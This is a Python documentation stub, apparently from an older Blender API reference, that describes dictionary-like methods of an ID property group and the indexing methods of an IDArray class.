def pop(item):
"""
Pop an item from the group property.
@type item: string
@param item: The item name.
@rtype: can be dict, list, int, float or string.
@return: The removed property.
"""
def update(updatedict):
"""
Updates items in the dict, similar to normal python
dictionary method .update().
@type updatedict: dict
@param updatedict: A dict of simple types to derive updated/new IDProperties from.
@rtype: None
@return: None
"""
def keys():
"""
Returns a list of the keys in this property group.
@rtype: list of strings.
@return: a list of the keys in this property group.
"""
def values():
"""
Returns a list of the values in this property group.
Note that unless a value is itself a property group or an array, you
cannot change it by changing the values in this list, you must change them
in the parent property group.
For example,
group['some_property'] = new_value
. . .is correct, while,
values = group.values()
values[0] = new_value
. . .is wrong.
        @rtype: list.
@return: a list of the values in this property group.
"""
def iteritems():
"""
        Implements the python dictionary iteritems method.
For example::
for k, v in group.iteritems():
print "Property name: " + k
print "Property value: " + str(v)
@rtype: an iterator that spits out items of the form [key, value]
@return: an iterator.
"""
def convert_to_pyobject():
"""
Converts the entire property group to a purely python form.
@rtype: dict
@return: A python dictionary representing the property group
"""
class IDArray:
"""
The IDArray Type
================
@ivar type: returns the type of the array, can be either IDP_Int or IDP_Float
"""
def __getitem__(index):
pass
def __setitem__(index, value):
pass
def __len__():
pass
|